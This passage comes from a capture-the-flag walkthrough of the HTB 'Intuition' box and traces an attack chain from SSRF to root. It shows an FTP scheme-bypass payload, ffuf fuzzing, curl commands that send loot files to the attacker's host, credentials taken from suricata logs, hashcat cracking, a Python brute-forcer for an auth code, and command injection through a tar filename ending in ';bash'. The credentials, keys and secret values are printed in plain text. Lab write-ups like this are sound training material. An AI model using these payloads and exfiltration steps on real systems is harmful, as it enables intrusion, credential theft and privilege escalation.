        return render_template('dashboard/create_pdf_report.html')

@dashboard_bp.route('/backup', methods=['GET'])
@admin_required
def backup():
    source_directory = os.path.abspath(os.path.dirname(__file__) + '../../../')
    current_datetime = datetime.now().strftime("%Y%m%d%H%M%S")
    backup_filename = f'app_backup_{current_datetime}.zip'
    with zipfile.ZipFile(backup_filename, 'w', zipfile.ZIP_DEFLATED) as zipf:
        for root, _, files in os.walk(source_directory):
            for file in files:
                file_path = os.path.join(root, file)
                arcname = os.path.relpath(file_path, source_directory)
                zipf.write(file_path, arcname=arcname)
    try:
        ftp = FTP('ftp.local')
        ftp.login(user='ftp_admin', passwd='u3jai8y71s2')
        ftp.cwd('/')
        with open(backup_filename, 'rb') as file:
            ftp.storbinary(f'STOR {backup_filename}', file)
        ftp.quit()
        os.remove(backup_filename)
        flash('Backup and upload completed successfully!', 'success')
    except Exception as e:
        flash(f'Error: {str(e)}', 'error')
    return redirect(url_for('dashboard.dashboard'))







While it’s really cool to see all that source code, I think the particularly interesting part is the backup() function in dashboard.py. First of all, we see right away that we have an FTP credential:

ftp_admin : u3jai8y71s2

Next, we can finally see what that dashboard.comprezzor.htb/backup route is actually doing. If I’m understanding this correctly, it will create a .zip archive of the /app/code directory and save it into the FTP server ftp.local as app_backup_20240501HHMMSS.zip, where 20240501 is the current date and HHMMSS is a 6-digit numeric representation of the time.
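Both of those assumptions are cheap to check offline. The sketch below mirrors the two relevant expressions from backup(); the helper names are mine, the module path is pieced together from the blueprint paths found earlier, and posixpath is used so the result is the same on any OS as it would be on the Linux target.

```python
import posixpath
from datetime import datetime

def backup_name(moment: datetime) -> str:
    """Mirror of the filename built in backup()."""
    return f"app_backup_{moment.strftime('%Y%m%d%H%M%S')}.zip"

def backup_source(module_file: str) -> str:
    """Mirror of os.path.abspath(os.path.dirname(__file__) + '../../../')."""
    # Note the missing slash: 'dashboard' + '../' becomes a component named 'dashboard..'
    return posixpath.normpath(posixpath.dirname(module_file) + "../../../")

print(backup_name(datetime(2024, 5, 1, 12, 6, 17)))
# app_backup_20240501120617.zip
print(backup_source("/app/code/blueprints/dashboard/dashboard.py"))
# /app/code
```

The odd-looking path concatenation only climbs two real levels, which is why the archive root ends up at /app/code rather than /app.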



I made a small test environment to check these assumptions:

When running app.py, I get this:

Thankfully, we already have a way to bypass the dissallowed_schemas check in create_pdf_report() - by inserting whitespace before the scheme of the URL. As such, I should be able to make a backup, then read it as a PDF. Then… somehow convert that back to a zip file? I’m not sure. For now, I’ll try to create a backup and fuzz for it.

Fuzzing for the backup

🚫 This is the wrong way. If you’re short on time, please skip this section.

Basically, we know the filename but will need to guess what hour and second it was created at. We need the hour because I’m not sure what time zone the target is in. We need the second because clocks aren’t perfectly accurate, and could easily drift by a few seconds.

As a starting point, I just made a backup, at 2024-05-01 12:06:17 (plus or minus a few seconds) local time:

Although I said I’m not sure what timezone the target is in, we can make a pretty good guess by assuming that their response headers are telling the truth. Here are the response headers (and some body) from the request I made to read /etc/passwd:

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)

Date: Wed, 01 May 2024 06:22:57 GMT

Content-Type: application/pdf

Content-Length: 12207

Connection: keep-alive

Content-Disposition: attachment; filename=report_45565.pdf

Last-Modified: Wed, 01 May 2024 06:22:56 GMT

Cache-Control: no-cache

ETag: "1714544576.9961698-12207-2683770363"

%PDF-1.4

%âã

1 0 obj

<<

/Title ()

/Creator (þÿ�w�k�h�t�m�l�t�o�p�d�f� �0�.�1�2�.�6)

/Producer (þÿ�Q�t� �5�.�1�5�.�2)

/CreationDate (D:20240501062256Z)

...

Since both the webserver header and the PDF writer responded with the same timestamp, the target is probably in GMT.
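As a quick sanity check of that reasoning, the two timestamps from the response can be parsed and compared. This is just a sketch using the standard library; the two strings are copied from the response above, and treating the trailing Z in the PDF date as UTC is my assumption.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Timestamp from the HTTP "Date" header
http_date = parsedate_to_datetime("Wed, 01 May 2024 06:22:57 GMT")

# Timestamp from the PDF /CreationDate field (trailing Z assumed to mean UTC)
pdf_date = datetime.strptime("20240501062256Z", "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)

drift = abs((http_date - pdf_date).total_seconds())
print(f"nginx and wkhtmltopdf disagree by {drift} second(s)")
```

A difference of a second or so, rather than a whole number of hours, is what suggests both clocks are on the same timezone.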

I’ll be fuzzing a request for this file, with HH and SS as parameters:

report_url=+ftp%3A%2F%2Fftp_admin%3Au3jai8y71s2%40ftp.local%2Fapp_backup_20240501HH06SS.zip

for i in {0..23}; do printf "%02d\n" $i; done > hours.txt

for i in {0..59}; do printf "%02d\n" $i; done > seconds.txt

Using those as wordlists, we can start fuzzing:

ffuf -u http://dashboard.comprezzor.htb/create_pdf_report \

-x http://127.0.0.1:8080 -X POST -w hours.txt:HH -w seconds.txt:SS \

-b 'user_data=eyJ1c2VyX2lkIjogMSwgInVzZXJuYW1lIjogImFkbWluIiwgInJvbGUiOiAiYWRtaW4ifXwzNDgyMjMzM2Q0NDRhZTBlNDAyMmY2Y2M2NzlhYzlkMjZkMWQxZDY4MmM1OWM2MWNmYmVhMjlkNzc2ZDU4OWQ5' -H 'Content-Type: application/x-www-form-urlencoded' \

-d 'report_url=+ftp%3A%2F%2Fftp_admin%3Au3jai8y71s2%40ftp.local%2Fapp_backup_20240501HH06SS.zip' \

-t 40 -c -v -fs 1675

FTP Loot

In my earlier fuzzing attempts, I overlooked something. A little bit of research about FTP has informed me that you can actually get the directory listing by requesting the directory path. In this case, the root directory /.
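For reference, here is a sketch of how the request body for that directory listing could be built. The function name ssrf_payload is hypothetical. The leading + is the form-encoded space that slips past the disallowed_schemas check, in the same way as the fuzzing payload.

```python
from urllib.parse import quote

def ssrf_payload(user, password, host, path="/"):
    """Build the report_url form field for an FTP URL, with a leading space."""
    url = f"ftp://{user}:{password}@{host}{path}"
    # safe="" forces ':', '/' and '@' to be percent-encoded as well
    return "report_url=+" + quote(url, safe="")

# A path ending in "/" asks the FTP server for a directory listing
print(ssrf_payload("ftp_admin", "u3jai8y71s2", "ftp.local", "/"))
```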

So, let’s utilize the same SSRF as before, but this time request the root directory:



We now see that there were no backup files to fuzz for… But there are some other interesting-looking files:

Here’s the contents of welcome_note.txt, some parts omitted for brevity:

Dear Devs, We are … thrive in your position. To facilitate your work and access to our systems, we have attached an SSH private key to this email. You can use the following passphrase to access it, Y27SH19HDIWD. Please ensure the utmost confidentiality and security … need further information, please feel free to me at adam@comprezzor.htb. Best regards, Adam

🎉 Wahoo! They just gave us the passphrase for the private key 😁 (Hopefully a key for the user adam?)



Hmm… Not so lucky. Thankfully, after a bit of research I found a tidy way to find the username associated with a private key if you already know the passphrase for the private key - you can just add it to your ssh agent:

ssh-add loot/private-8297.key

And there we go. We now have the username, passphrase, and private key for dev_acc : Y27SH19HDIWD

⚠️ Remember to delete this key from your ssh agent when you’re done with the box:

ssh-add -d loot/private-8297.key







Alright, let’s attempt to log in with that whole credential:

🎉 Success! The SSH connection drops you into /home/dev_acc, adjacent to the user flag. Simply cat it out for the points:

cat user.txt

ROOT FLAG

Local enumeration: dev_acc



I’ll follow my usual Linux Local Enumeration strategy. To keep this walkthrough as brief as possible, I’ll omit the actual procedure of user enumeration, and instead just jot down any meaningful results:

- There are three “human” users on the box: adam, dev_acc and lopez. All three have a home directory.

- dev_acc owns only their home directory, nothing else.

- The target box has the following useful software: nc, netcat, curl, wget, python3, perl, tmux

- netstat shows some interesting services listening. By connecting to each with nc, I’ve confirmed that ports 4444, 8080 and 35949 are all serving http.

☝️ The service on port 40999 seems to randomize its port. Every time the box is reset, there is a different port.



- I found a nonstandard directory, /opt/ftp, which would seem to suggest that there is another FTP user, adam.

- The target is running wpa_supplicant, which seems pretty odd. Perhaps just an oversight by the box creator?

- Linpeas showed quite a bit of stuff regarding the VNC connection and an XVFB server (like X11, but you don’t actually need a screen), however I think these are probably due to the headless browser that checks for XSS payloads.





Pspy

Things like pspy need to be run locally (as far as I know). I’ll transfer some of my tools over to the target to make this easier. For this, I’ll once again use my own tool, simple-http-server. Feel free to just use PHP or http.server instead, but my tool has advantages for data exfiltration.

If I wanted to run pspy without “touching disk”, I think the way to do it would actually be to download the tool into /dev/shm and run it from there. If I’m not mistaken, that would all be in RAM and would not actually touch disk 🤔



This is an example of the geckodriver running to “check the bug reports” and trip an XSS payload:

I think this is related, but to be honest I’m not really sure yet. Note the use of x11vnc and Xvfb:



Here, we can see port mappings from the docker container to the host system - 4444 to 4444, and 80 to 8080:





I was lucky enough to see someone log in as lopez, read some file, then run runner list:

😉 Maybe a spoiler, but I’ll take all the help I can get!

This runner thing seems like it might be important:

Port forwarding

Next I want to investigate what’s running on ports 4444, 8080, and 40999. I’ll SSH into the box again, but this time I’ll specify some forwarded ports:

☝️ I frequently use proxies on port 8080, so I mapped that to 9090 instead.



Port 4444

I wasn’t too surprised to see this, but it looks like port 4444 is Selenium Grid:

This also explains the x11vnc that we saw earlier - if you click on Sessions there is an option to view a session over VNC.



Just to be thorough, I performed directory enumeration on this port:

WLIST="/usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt"

ffuf -w $WLIST:FUZZ -u http://localhost:4444/FUZZ -t 40 -ic -c -v



The /ui page is the one shown in the image above. However, /status shows the Selenium Grid status as a long json file (which I saved locally). The most interesting part was the VNC connection details:

Maybe I should try connecting to VNC later, and see what the Selenium driver is looking at? 🚩

Port 8080





From the pspy results, we’re expecting this one to be the http server from the docker container. Navigating to it yields a 404 Not Found:

I suspect that we’re actually looking at comprezzor.htb, so I’ll try setting a host header:

WLIST="/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt"

ffuf -w $WLIST:FUZZ -u http://localhost:9090 -H 'Host: FUZZ.comprezzor.htb' -t 40 -ic -c -v

Yep, exactly as suspected:

Checking /etc/nginx/sites-available/reverse_proxy confirms that these (plus comprezzor.htb) are the only domains behind the nginx reverse proxy.



Port 40999

This port is a little more mysterious. Navigating to it provides little info:

Whatweb doesn’t show anything useful either:

I’ll try fuzzing for whatever this is. First, I’ll try some vhost fuzzing:

WLIST="/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt"

ffuf -w $WLIST:FUZZ -u http://localhost:40999 -H 'Host: FUZZ.htb' -t 40 -ic -c -v

ffuf -w $WLIST:FUZZ -u http://localhost:40999 -H 'Host: FUZZ.local' -t 40 -ic -c -v

But that didn’t turn up any results.

Back to the web app



During local enumeration, it’s usually a good idea to go back to your entry point and enumerate more thoroughly from an inside perspective. For this box, that means I should search through the files of the web app, in /var/www/app.

Looking around manually a bit, the blueprints/auth subdirectory seems like it has some interesting contents.

Let’s upload it to my attacker machine

for F in auth.py auth_utils.py users.db users.sql; do

curl -X POST -F "file=@./$F" http://10.10.14.9:8000;

done





Then on my attacker machine I can freely examine the files. The database contents look like they might be useful:

I’ll get to work cracking these hashes after I’ve done a little more enumeration 🚩

The auth_utils.py file contained some code that confirms a suspicion I had about the cookie format that I had mentioned earlier. It also shows exactly how a user is created in the database:

from werkzeug.security import generate_password_hash

SECRET_KEY = 'JS781FJS07SMSAH27SG'
USER_DB_FILE = os.path.join(os.path.dirname(__file__), 'users.db')

# ...

def create_user(username, password, role='user'):
    try:
        with sqlite3.connect(USER_DB_FILE) as conn:
            cursor = conn.cursor()
            cursor.execute('INSERT INTO users (username, password, role) VALUES (?,?,?)', (username,generate_password_hash(password,'sha256'), role))
            conn.commit()
            return True
    except Exception as e:
        return False

def serialize_user_data(user_id, username, role):
    data = {
        'user_id': user_id,
        'username': username,
        'role': role
    }
    serialized_data = json.dumps(data).encode('utf-8')
    signature = hmac.new(SECRET_KEY.encode('utf-8'), serialized_data, hashlib.sha256).hexdigest()
    return base64.b64encode(serialized_data + b'|' + signature.encode('utf-8')).decode('utf-8')

# ...

That seems to be everything new to learn from the web app. There is also a database for bug reports, blueprints/report/reports.db, but inside is only a single table containing the bug reports we already saw in the web app.
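To convince myself about the cookie format, here is a minimal sketch that reverses serialize_user_data from auth_utils.py: it base64-decodes a user_data cookie, splits off the signature, and recomputes the HMAC. The parse_cookie helper is my own and is not part of the web app; serialize_user_data is copied from the loot so that the example is self-contained.

```python
import base64
import hashlib
import hmac
import json

SECRET_KEY = 'JS781FJS07SMSAH27SG'  # taken from auth_utils.py

def serialize_user_data(user_id, username, role):
    """Same logic as the function found in auth_utils.py."""
    data = {'user_id': user_id, 'username': username, 'role': role}
    serialized = json.dumps(data).encode('utf-8')
    signature = hmac.new(SECRET_KEY.encode('utf-8'), serialized, hashlib.sha256).hexdigest()
    return base64.b64encode(serialized + b'|' + signature.encode('utf-8')).decode('utf-8')

def parse_cookie(cookie, key=SECRET_KEY):
    """Hypothetical helper: return (payload dict, signature_is_valid)."""
    raw = base64.b64decode(cookie)
    # The hex signature never contains '|', so split on the last one
    payload, _, signature = raw.rpartition(b'|')
    expected = hmac.new(key.encode('utf-8'), payload, hashlib.sha256).hexdigest()
    return json.loads(payload), hmac.compare_digest(expected.encode('utf-8'), signature)

cookie = serialize_user_data(1, 'admin', 'admin')
print(parse_cookie(cookie))
```

Since the secret key is now known, the same serialize_user_data call would in principle let us mint a cookie for any user and role.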

Grepping for credentials

As a last step of local enumeration, I like to go to each notable directory under / (usually /home, /etc, /var, /opt, sometimes /media, and if I’m desperate /usr) and grep for credentials. I do this by running a short bash script:

# for example, start at etc

cd /etc

# use zgrep if available

GREP_PROG=$(which zgrep || which grep)

# loop through all "human" users on the box

for usr in `cat /etc/passwd | grep -v nologin | grep -v /bin/false | grep -vE '^sync:' | cut -d ':' -f 1`; do

echo "---------------";

echo "Searching for user: $usr";

# grep with a max depth of 2 and search for username

find . -maxdepth 2 -type f -exec $GREP_PROG -nH $usr {} \; 2>/dev/null;

done







When I ran this over the /var/log directory, I found something interesting: a mention of the lopez user logging in using FTP:

Sorry for the wide screenshot - my HTB connection is so bad right now that I can hardly use SSH… so I’m documenting this using my terminal history.

I’m not sure what this suricata thing is, but it appears to be logging network activity. The image above shows the beginning of an FTP login, logged in eve.json.7.gz. To examine the file further, I uploaded to my attacker http server and unzipped it:

# On the target machine

cd suricata

F=./eve.json.7.gz; curl -X POST -F "file=@$F" http://10.10.14.9:8000

# On attacker machine

mv www/eve.json.7.gz loot/

cd loot

gzip -d eve.json.7.gz

I saw that each of these log entries has a flow_id on it that may be shared by multiple entries, so I decided to follow the flow_id. Following each occurrence of that flow_id, I was able to read the whole history of the FTP transaction with lopez. Fortunately, the next entry contained an FTP password!
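Following a flow_id by hand gets tedious in a log this size, so here is a sketch of the same idea in Python. It assumes eve.json holds one JSON object per line, each with a flow_id field. The sample records are made up, and the ftp.command / ftp.command_data field names are my assumption about how the FTP events are shaped.

```python
import json

def events_for_flow(lines, flow_id):
    """Return the parsed events that share one flow_id, in file order."""
    matched = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        if event.get("flow_id") == flow_id:
            matched.append(event)
    return matched

# Made-up sample records, shaped like eve.json lines (all values are placeholders)
sample = [
    '{"flow_id": 111, "event_type": "ftp", "ftp": {"command": "USER", "command_data": "someuser"}}',
    '{"flow_id": 222, "event_type": "dns"}',
    '{"flow_id": 111, "event_type": "ftp", "ftp": {"command": "PASS", "command_data": "placeholder"}}',
]
for event in events_for_flow(sample, 111):
    print(event["ftp"]["command"], event["ftp"]["command_data"])
```

Any iterable of lines works as input, so a file opened with gzip.open(path, "rt") can be passed in directly without unzipping it first.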

👀 Unfortunately, this was a failed authentication attempt. That’s OK - the zgrep results showed two entries, so let’s try the other flow_id instead:

🍍 There we go - a successful authentication. We now have a new FTP credential: lopez : Lopezz1992%123. I’ll check for credential re-use after doing the rest of my “to-do” queue 🚩



Cracking the hashes

These werkzeug hashes are in a bit of a weird format. Let’s check hashcat’s modes to see if there’s anything applicable:

hashcat --example-hashes | grep -i werkzeug -B 1 -A 18

So to match this format, I put the hashes into a file like this:



Then we let loose the hashcat:

hashcat -m 30120 --username auth.hashes /usr/share/wordlists/rockyou.txt

After a few seconds, we have a result:

A little odd that there’s a space in the password, but whatever

Great, so we have a credential for the web app dashboard adam : adam gray
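As far as I understand it, the 'sha256' method that create_user passes to generate_password_hash makes older Werkzeug releases store sha256$salt$digest, where the digest is an HMAC-SHA256 keyed with the salt. Under that assumption, a cracked password can be double-checked offline with a few lines. Both helper names and the example salt below are hypothetical.

```python
import hashlib
import hmac

def legacy_werkzeug_hash(password, salt, method="sha256"):
    """Recreate the assumed legacy format: method$salt$HMAC(salt, password)."""
    digest = hmac.new(salt.encode("utf-8"), password.encode("utf-8"), method).hexdigest()
    return f"{method}${salt}${digest}"

def check_legacy_hash(stored, password):
    """Compare a candidate password against a stored method$salt$digest string."""
    method, salt, _digest = stored.split("$", 2)
    return hmac.compare_digest(legacy_werkzeug_hash(password, salt, method), stored)

# "examplesalt" is a placeholder, not the salt from users.db
stored = legacy_werkzeug_hash("adam gray", "examplesalt")
print(check_legacy_hash(stored, "adam gray"))
```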

❌ I checked this password for SSH authentication as adam - no luck!



During my initial steps at local enumeration, I found the nonstandard directory /opt/ftp with subdirectories ftp_admin and adam - which suggests that adam is also an FTP user. So let’s try logging into FTP with this new credential:

It worked! There’s a /backup/runner1 directory inside with three files: run-tests.sh, runner1, and runner1.c. I downloaded each of these from FTP then recreated the directory structure and archived it. Then I uploaded the file to my attacker machine.

cd /tmp/.Tools

mkdir -p backup/runner1

mv run-tests.sh runner1 runner1.c backup/runner1/

tar -czvf backup.tar.gz ./backup

curl -X POST -F "file=@./backup.tar.gz" http://10.10.14.9:8000



Runner1

Back on my attacker machine, I examined the runner1 backup. The run-tests.sh file has some interesting hints:

#!/bin/bash

# List playbooks

./runner1 list

# Run playbooks [Need authentication]

# ./runner run [playbook number] -a [auth code]

#./runner1 run 1 -a "UHI75GHI****"

# Install roles [Need authentication]



# ./runner install [role url] -a [auth code]

#./runner1 install http://role.host.tld/role.tar -a "UHI75GHI****"

🤔 “playbook” eh? Makes me think of Ansible.

Also, it looks like we have a partial “auth code” in the comments. I wonder if there are literally four trailing characters. Given the alphabet of the prefix of that auth code, that only leaves 36 ^ 4 = 1679616 guesses to enumerate the whole thing.

I won’t show the whole contents of it here, but the source code for runner1.c shows that its purpose is mostly to run ansible playbooks. To do so, we need to authenticate by providing the right auth key. It compares the MD5 hash of the provided auth code with a hardcoded MD5 hash and checks for a match.
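Since the check is just an MD5 comparison, the search could in principle be done offline with hashlib instead of by running the binary. The sketch below is not what I actually ran. The function name is hypothetical, and the target hash in the demo is computed from a made-up code rather than taken from runner1.c.

```python
import hashlib
import itertools
import string

ALPHABET = string.ascii_uppercase + string.digits

def crack_suffix(prefix, target_md5, length, alphabet=ALPHABET):
    """Try every suffix of the given length; return the matching code or None."""
    for combo in itertools.product(alphabet, repeat=length):
        candidate = prefix + "".join(combo)
        if hashlib.md5(candidate.encode("utf-8")).hexdigest() == target_md5:
            return candidate
    return None

# Demo with a made-up two-character suffix so that it finishes instantly
demo_target = hashlib.md5(b"UHI75GHIA7").hexdigest()
print(crack_suffix("UHI75GHI", demo_target, 2))
```

For the real thing, target_md5 would be the hardcoded hash from the source and length would be 4.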

The program has two calls to system that might be vulnerable if I can figure out a way to provide the right inputs.



But how will I obtain the right auth key? If we can assume the comments in run-tests.sh are accurate, then there are 4 characters to guess. I wrote a short program to try guessing two characters, and it only took 1-2s to run, so then to do the same thing with 4 characters should take only half an hour, roughly.
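Here is that back-of-the-envelope estimate spelled out. It assumes a single process and takes 1.5s as the midpoint of my 1-2s measurement for two characters. The function name is just for illustration.

```python
def estimate_seconds(sample_len, sample_seconds, target_len, alphabet_size=36):
    """Scale a timed run over sample_len characters up to target_len characters."""
    rate = alphabet_size ** sample_len / sample_seconds  # guesses per second
    return alphabet_size ** target_len / rate

total = 36 ** 4
seconds = estimate_seconds(2, 1.5, 4)
print(f"{total} guesses, roughly {seconds / 60:.1f} minutes on one core")
```

Splitting the work across several processes divides that figure further, which is why the multiprocessing version is worth the extra boilerplate.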

Here is the program I made for cracking the auth key (I’ve left out the parts of main that are just boilerplate multiprocessing code):

#!/usr/bin/python3
import subprocess
import itertools
import multiprocessing
import string

alphabet = string.ascii_uppercase + string.digits
prefix = 'UHI75GHI'
num_letters = 4
failure = b'Error: Authentication failed.\n'

def worker(start, end, result_queue):
    # Get all combinations of the alphabet that are num_letters long
    combinations = itertools.product(alphabet, repeat=num_letters)
    # This worker should only process its portion of the whole set of combinations
    combinations_slice = itertools.islice(combinations, start, end)
    # Transform the combinations (tuples of letters) into joined strings
    result = list(map(lambda t: ''.join(t), list(combinations_slice)))
    # Run the binary for every combination that this worker should process
    for letters in result:
        # Start a subprocess using the known prefix + letters
        r = subprocess.run(["/home/kali/Box_Notes/Intuition/loot/backup/runner1/runner1", "list", "-a", prefix+letters], capture_output=True)
        # If the stdout of the result doesn't match the failure string, we cracked it!
        if r.stdout != failure:
            print(prefix+letters)
            result_queue.put(prefix+letters)

def main():
    # Establish a queue for results
    # Create a pool of 4 processes, each one gets a worker
    # I'm using a 4-core CPU. If you have more, increase the number of processes.
    # Print all entries of the result_queue
    ...  # multiprocessing boilerplate omitted

if __name__ == "__main__":
    main()
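For anyone who wants to fill in the omitted boilerplate, something along these lines should do. This is a sketch rather than my exact code: split_ranges and run_workers are illustrative names, and I’ve used a Manager queue so that joining the processes before draining the results can’t block.

```python
import multiprocessing
import string

ALPHABET = string.ascii_uppercase + string.digits
NUM_LETTERS = 4

def split_ranges(total, parts):
    """Split range(total) into `parts` contiguous (start, end) slices."""
    step, extra = divmod(total, parts)
    ranges, start = [], 0
    for i in range(parts):
        end = start + step + (1 if i < extra else 0)
        ranges.append((start, end))
        start = end
    return ranges

def run_workers(worker, num_procs=4):
    """Start one process per slice, wait for all of them, then collect results."""
    with multiprocessing.Manager() as manager:
        result_queue = manager.Queue()
        total = len(ALPHABET) ** NUM_LETTERS
        procs = [
            multiprocessing.Process(target=worker, args=(start, end, result_queue))
            for start, end in split_ranges(total, num_procs)
        ]
        for proc in procs:
            proc.start()
        for proc in procs:
            proc.join()
        results = []
        while not result_queue.empty():
            results.append(result_queue.get())
    return results
```

Calling run_workers(worker) from main() with the worker function shown above, then printing the returned list, covers all four commented steps.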

I started the program and went to make some tea. After a few minutes, I returned to find a result:



👏 To verify, I tried running runner1 using this UHI75GHINKOP and it does actually work:

I know this looks like it’s failing, but that’s just because I’m testing locally on my attacker machine. If authentication failed, it would have said “Error: Authentication failed” instead - so this is actually a positive result.



Lopez credential reuse

I’ll try using that credential for lopez to try logging into other services, like SSH. Again, the credential was lopez : Lopezz1992%123:

🎉 Awesome! We now have access to lopez.

Local enumeration: lopez

Note in the image from the previous section that lopez is also in the sys-adm group. I know I’ve seen that before, but I can’t recall exactly where. Let’s search the filesystem for directories that group owns:

Ah, right - it was those two directories in /opt. These are clearly related to the runner1 program that we found inside the backup directory we found in the FTP server as adam.



Since we actually have a password for this user, one of the first things I like to do is to check what they can sudo:

😹 Alright, this is clearly the privesc vector.

Partly because my connection is quite bad, partly because it’s convenient, I’m going to transfer these two directories in /opt back to my attacker machine for further analysis:

I had to reset my VPN, so I have a new IP address now

tar -czvf /tmp/.Tools/playbooks.tar.gz /opt/playbooks

F=./runner2; curl -X POST -F "file=@$F" http://10.10.14.17:8000

F=/tmp/.Tools/playbooks.tar.gz; curl -X POST -F "file=@$F" http://10.10.14.17:8000

Playbooks



The /opt/playbooks directory contains only two files, apt_update.yml and inventory.ini. apt_update is definitely an ansible playbook:

---
- name: Update and Upgrade APT Packages test
  hosts: local
  become: yes
  tasks:
    - name: Update APT Cache
      apt:
        update_cache: yes
      when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'
    - name: Upgrade APT Packages
      apt:
        upgrade: dist
        update_cache: yes
      when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'

And inventory.ini hints at some very juicy items:

[local]

127.0.0.1

127.0.0.1 ansible_ssh_user=root ansible_ssh_private_key_file=/root/keys/private.key

[docker_web_servers]

172.21.0.2

I wonder if it would be possible to run the ansible playbook, and intercept the SSH key… kind of a MITM attack? 🤔

Runner2 Analysis



At first glance, runner2 is definitely a little different than runner1:



Maybe we can get it to divulge some more info by feeding it a valid json file:

curl http://10.10.14.17:8000/test.json -o /tmp/.Tools/test.json

sudo /opt/runner2/runner2 /tmp/.Tools/test.json

The program shows a message: “Run key missing or invalid.”.

Alright, time to put my reverse engineering hardhat on and dive in… I’ll use BinaryNinja.



Honestly, taking a quick look at main() reveals that this program is pretty sane. They haven’t really tried to obfuscate anything, which is nice. The program begins with this:

- checking if args were provided

- testing if the argument is a json file

- checking that it parses as valid json

- checking that the json contains an auth key

- checking that the json contains an action

When I ran it earlier using test.json, my run failed at the check at line 14:

data_2148 is a pointer to the string literal “run”; rax_16 is a pointer to the action in the json file.

By the way, json_object_get is a library call from the JSON-C library.

I’m going to keep drilling down the json structure, figuring out what labels it expects at each level of the json “tree”.

☝️ Whenever I figure out what should be where, I’ll rename the variable - so if subsequent images in this guide show different variable names, it’s because that’s the reverse engineering process! I’ll be renaming variables as [something]_key or [something]_val if it seems like it’s part of the json structure.

If you’re following along with this guide, reference line numbers instead of variable names to keep yourself oriented.

check_auth function

A quick comparison of the check_auth function in runner2 to the auth mechanism in runner1 shows that (thank goodness) they use the same MD5 hash:

That means that I won’t need to repeat the exercise of brute-forcing the hash 👏





Main code branches

I see three main branches for the program flow:

The “run” branch seems to be the most promising for privilege escalation. We already saw from /opt/playbooks/apt_update.yml that we can initiate privileged actions using an ansible playbook, so why not get it to pop us a shell or make an SUID bash or something?

list action

The list action is very simple. It does not require an auth_code and simply lists out the playbooks.



run action

Shown below is the first part of the “run” branch. Basically, it checks the auth_code. If we’re authorized, then it starts reading the /opt/playbooks directory:

This part confuses me… the value of run.num must be 3? What’s the point of that?

From there, it starts looping through the /opt/playbooks directory. For each entry, it checks that the entry is d_type = DT_REG (a regular file) and contains the substring .yml. It keeps looping until the index of the file (starting at 1 and incrementing after checking the file) matches the run.num value from the json file.

💡 Ohh… Now I understand. We have to choose run.num = 3 because of the index of the directory entries:

1. . (the current directory)

2. .. (the parent directory)

3. apt_update.yml

And since we can’t overwrite apt_update.yml or mask it (or can I?) then following the “run” branch is probably a dead-end in terms of privesc.
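To check my reading of that loop, here is a small simulation of it. This is only my interpretation of the decompiled logic, not the binary’s actual code. The directory entries are hard-coded in the order I assume readdir returns them, which is not guaranteed in general.

```python
def pick_playbook(entries, num):
    """Simulate the loop: the index counts every entry, but only .yml files match."""
    index = 1
    for name, is_regular_file in entries:
        if index == num and is_regular_file and ".yml" in name:
            return name
        index += 1
    return None

# Assumed directory order: ".", "..", then the only playbook
entries = [(".", False), ("..", False), ("apt_update.yml", True)]
for num in (1, 2, 3):
    print(num, pick_playbook(entries, num))
```

Under these assumptions, only num = 3 selects a playbook, which matches what I saw.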





Install action

Just like “run”, the “install” action requires an auth_code:

If the auth_code is valid and run.role_file is provided, then installRole is called:

Aha! Look at that system call 😁 There is no validation on what we place into run.role_file. After forming a valid json file, I’ll get to work in figuring out how to use this for command injection 🚩

Red Hat describes Ansible Galaxy as “a repository for Ansible Roles that are available to drop directly into your Playbooks to streamline your automation projects.”

But we don’t care about that. For us, it’s just a place to do command injection 😎



The JSON file

If I’m following along properly, there are three different structures that the json file might have, one for each major branch of the code. First, the list one is really simple:

{

"run": {

"action": "list"

}

}

The run action requires an auth_code and some run details:

{
  "auth_code": "UHI75GHINKOP",
  "run": {
    "action": "run",
    "num": 3
  }
}

Likewise for the install action:

{

"auth_code": "UHI75GHINKOP",

"run": {

"action": "install",

"role_file": ""

}

}
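Hand-written JSON is easy to get subtly wrong (a stray trailing comma is enough to make the parser reject it), so generating these files is a bit safer. Here is a minimal sketch; build_request is a hypothetical helper, and the key names are the ones I worked out from the decompilation.

```python
import json

def build_request(action, auth_code=None, **run_fields):
    """Return a JSON document for runner2 with the given action and run details."""
    doc = {"run": {"action": action, **run_fields}}
    if auth_code is not None:
        doc = {"auth_code": auth_code, **doc}
    return json.dumps(doc, indent=2)

print(build_request("list"))
print(build_request("run", "UHI75GHINKOP", num=3))
print(build_request("install", "UHI75GHINKOP", role_file=""))
```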



That being said, I only really care about the install action. As we saw in the code, the role_file is expected to be a valid tar archive, so let’s make one:

cd /tmp/.Tools

echo "Hello world" > nothing.txt

tar -cvf nothing.tar nothing.txt

Runner2 Exploitation

And the json file to reference this tar and also take a first attempt at command injection is as follows:

{

"auth_code": "UHI75GHINKOP",

"run": {

"action": "install",

"role_file": "/tmp/.Tools/nothing.tar;id"

}

}



Alright, let’s try it out:

🤔 Hmm… why does it say this is an invalid tar archive?

I guess it’s possible that the full string is being parsed. I’ll try inserting a null byte \x00, which should terminate the string in C, but might pass through the JSON:

{

"auth_code": "UHI75GHINKOP",

"run": {

"action": "install",

"role_file": "/tmp/.Tools/nothing.tar\x00;id"

}

}

🤕 Oof. It liked that even less!



💡 I know what might work. A while ago, I read a really interesting paper called Back to the Future: Unix Wildcards Gone Wild. While it didn’t talk about this specifically, it does discuss injecting command arguments inside filenames. So, what if the command injection is in the filename itself?

I’ll take a valid/normal tar file and just rename it with a command injection on the end. And I’ll reference that role_file with its actual name. I.e. the command injection takes place at the filesystem level, not within the JSON:

{

"auth_code": "UHI75GHINKOP",

"run": {

"action": "install",

"role_file": "/tmp/.Tools/nothing.tar;id"

}

}

mv /tmp/.Tools/nothing.tar '/tmp/.Tools/nothing.tar;id'



OK, let’s try running it with the above json contents and tar file name:



🎉 Yes!!! It worked. Now I’ll try another payload: /tmp/.Tools/nothing.tar;bash
